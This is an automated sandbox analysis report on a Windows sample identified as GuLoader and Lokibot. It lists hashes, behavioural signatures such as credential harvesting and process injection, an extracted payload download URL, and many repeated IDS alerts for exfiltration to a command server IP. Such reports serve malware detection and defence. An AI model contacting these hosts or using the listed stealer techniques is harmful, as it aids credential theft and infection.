Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2GirCpksIO.exe

Overview

General Information

Sample Name:2GirCpksIO.exe
Analysis ID:526365
MD5:5cc619f7dd365ec061f1f385d25bea30
SHA1:5b28cb97973da18953fb284648f13257f0aba2f3
SHA256:7f5124088c09a925ad3a162b4e56391557dfc7d9950b9a55044036698d369d13
Infos:

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected Lokibot
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • 2GirCpksIO.exe (PID: 7984 cmdline: "C:\Users\user\Desktop\2GirCpksIO.exe" MD5: 5CC619F7DD365EC061F1F385D25BEA30)
    • 2GirCpksIO.exe (PID: 4560 cmdline: "C:\Users\user\Desktop\2GirCpksIO.exe" MD5: 5CC619F7DD365EC061F1F385D25BEA30)
      • lsass.exe (PID: 1016 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
  • UserOOBEBroker.exe (PID: 4236 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://afrocompass.com/karinedocesesalgados_Hpi"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.6231878648.0000000002D10000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        Process Memory Space: 2GirCpksIO.exe PID: 4560JoeSecurity_Lokibot_1Yara detected LokibotJoe Security

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\lsass.exe, CommandLine: C:\Windows\system32\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: "C:\Users\user\Desktop\2GirCpksIO.exe" , ParentImage: C:\Users\user\Desktop\2GirCpksIO.exe, ParentProcessId: 4560, ProcessCommandLine: C:\Windows\system32\lsass.exe, ProcessId: 1016

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://afrocompass.com/karinedocesesalgados_Hpi"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 2GirCpksIO.exeVirustotal: Detection: 32%Perma Link
          Source: 2GirCpksIO.exeReversingLabs: Detection: 20%
          Multi AV Scanner detection for domain / URLShow sources
          Source: karinedocesesalgados.com.brVirustotal: Detection: 7%Perma Link
          Source: 2GirCpksIO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 68.66.226.70:443 -> 192.168.11.20:49787 version: TLS 1.2

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49788 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49788 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49788 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49788 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49789 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49789 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49790 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49790 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49790 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49790 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49791 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49791 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49791 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49791 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49792 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49792 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49792 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49792 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49793 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49793 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49793 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49793 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49794 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49794 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49794 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49794 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49795 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49795 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49795 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49795 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49796 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49796 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49796 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49796 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49797 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49797 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49797 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49797 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49798 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49798 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49798 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49798 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49799 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49799 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49799 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49799 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49800 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49800 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49800 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49800 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49801 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49801 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49801 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49801 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49802 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49802 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49802 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49802 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49803 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49803 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49803 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49803 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49804 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49804 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49804 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49804 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49805 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49805 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49805 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49805 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49806 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49806 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49806 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49806 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49807 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49807 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49807 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49807 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49808 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49808 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49808 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49808 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49809 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49809 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49809 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49809 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49810 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49810 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49810 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49810 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49811 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49811 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49811 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49811 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49812 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49812 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49812 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49812 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49813 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49813 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49813 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49813 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49814 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49814 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49814 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49814 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49815 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49815 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49815 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49815 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49816 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49816 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49816 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49816 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49817 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49817 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49817 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49817 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49818 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49818 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49818 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49818 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49819 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49819 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49819 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49819 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49820 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49820 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49820 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49820 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49821 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49821 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49821 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49821 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49822 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49822 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49822 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49822 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49823 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49823 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49823 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49823 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49824 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49824 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49824 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49824 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49825 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49825 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49825 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49825 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49826 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49826 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49826 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49826 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49827 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49827 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49827 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49827 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49828 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49828 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49828 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49828 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49829 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49829 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49829 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49829 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49830 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49830 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49830 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49830 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49831 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49831 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49831 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49831 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49832 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49832 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49832 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49832 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49833 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49833 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49833 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49833 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49834 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49834 -> 192.185.217.246:80
